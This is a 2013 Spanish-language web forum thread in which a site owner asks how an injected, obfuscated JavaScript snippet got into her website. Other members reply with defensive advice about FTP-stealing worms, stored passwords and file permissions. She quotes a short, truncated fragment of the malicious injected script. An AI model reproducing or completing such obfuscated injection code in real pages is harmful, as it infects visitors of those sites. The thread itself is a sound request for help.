Comunidad de diseño web y desarrollo en internet online

ayuda: código malicioso

Citar            
MensajeEscrito el 19 Nov 2013 12:39 pm
hola a tod@s

(no sé si este será el foro adecuado para esta cuestión...)

he tenido que desactivar una web que tenia hecha de hace tiempo al haberle incrustado "alguien" un codigo javascript.
he estado buscando información sobre este código, para ver de que se trataba y cómo lo introducen, pero en san google solo he encontrado que muchas otras páginas tienen en mismo código y google las reporta como website sospechoso. con una búsqueda "javascript uroji" hasta me aparece la página de hoffman como "google reports hoffmanncompany.com as suspicious website".

el código, obviamente, no lo voy a poner aquí, pero sí algún extracto (que también aparece en las descripciones en las búsquedas de google). ¿sabéis cómo introducen estos códigos y de qué maneras se puede evitar?

milchísimas gracias

extracto del código:

Código :

<!--a9a007--><script type="text/javascript" language="javascript"> uroji="spl"+"i"+"t";ijt=window;clmkx="0"+"x";zbvyzm=(5-3-1);try{--(document["body"])}catch(lmtk){ifl=false;try{}catch(jwrbha)


(a este código le siguen unas cuantas sentencias más del tipo "if" y después un montón de cifras del tipo número hexadecimal:número hexadecimal:número hexadecimal:número hexadecimal:número hexadecimal)

Por kaquna

68 de clabLevel



Genero:Femenino  

safari
Citar            
MensajeEscrito el 19 Nov 2013 03:29 pm
¿Qué programa de FTP usas para subir cosas a ese hosting?.

Por DriverOp

Claber

2510 de clabLevel



 

opera
Citar            
MensajeEscrito el 19 Nov 2013 03:42 pm
cyberduck...

Por kaquna

68 de clabLevel



Genero:Femenino  

safari
Citar            
MensajeEscrito el 19 Nov 2013 04:37 pm
Bien. No lo conozco. Pero te comento por qué pregunto esto. Hay gusanos (malware) que usan la configuración de los programas de FTP para infectar los sitios que tengas almacenados en ellos. Entonces por más que borres el código malicioso del sitio en cuestión, al tener infectada la máquina donde está el programa de FTP, el gusano sigue infectando los sitios.

La recomendación aquí es que hagas una revisión de tu propia máquina y trata de no almacenar las contraseñas de FTP. Esta recomendación va para cualquiera que tenga acceso por FTP al sitio.

Por DriverOp

Claber

2510 de clabLevel



 

opera
Citar            
MensajeEscrito el 19 Nov 2013 05:03 pm
bueno... mi máquina es un mac y no creo que esté infectada ( :wink: )
además, manejo varias ftp's y solo se ha infectado una, pero gracias por la aclaración. echaré un vistazo a lo que me cuentas y lo tendré presente. no sabía de la existencia de ese malware.

de todas formas, lo primero que he hecho ha sido cambiar todas las contraseñas...

Por kaquna

68 de clabLevel



Genero:Femenino  

safari
Citar            
MensajeEscrito el 19 Nov 2013 05:04 pm
muchas gracias por tus respuestas

Por kaquna

68 de clabLevel



Genero:Femenino  

safari
Citar            
MensajeEscrito el 19 Nov 2013 06:55 pm
Que sea Mac no significa que no te puedas infectar con nada. (De hecho en nuestra oficina tenemos varias mac y más de una vez hemos encontrado "bichos").

Y aunque eso sea cierto, otras personas que no tienen Mac pudieron haberse infectado con malware que a su vez infectan sitios webs.

Y si no es esto, lo otro que queda es que se están aprovechando de algún bug en el código de la página (¿formulario de contacto?) o del propio servidor...

Por DriverOp

Claber

2510 de clabLevel



 

opera
Citar            
MensajeEscrito el 19 Nov 2013 11:02 pm
LA inyección de codigo a veces es por cookies uff miles de cosas..

Revisa cuales son los permisos más adecuados para tus carpetas y archivos.. bloquea el archivo que tiene la inyección con un .htaccess para que sea de solo lectura.

Hay miles de cosas que puedes hacer pero todo es investigar, leer y aprender.

Por elporfirio

Claber

652 de clabLevel

1 tutorial

Genero:Masculino  

FullStack Web Developer

firefox

 

Cristalab BabyBlue v4 + V4 © 2011 Cristalab
Powered by ClabEngines v4, HTML5, love and ponies.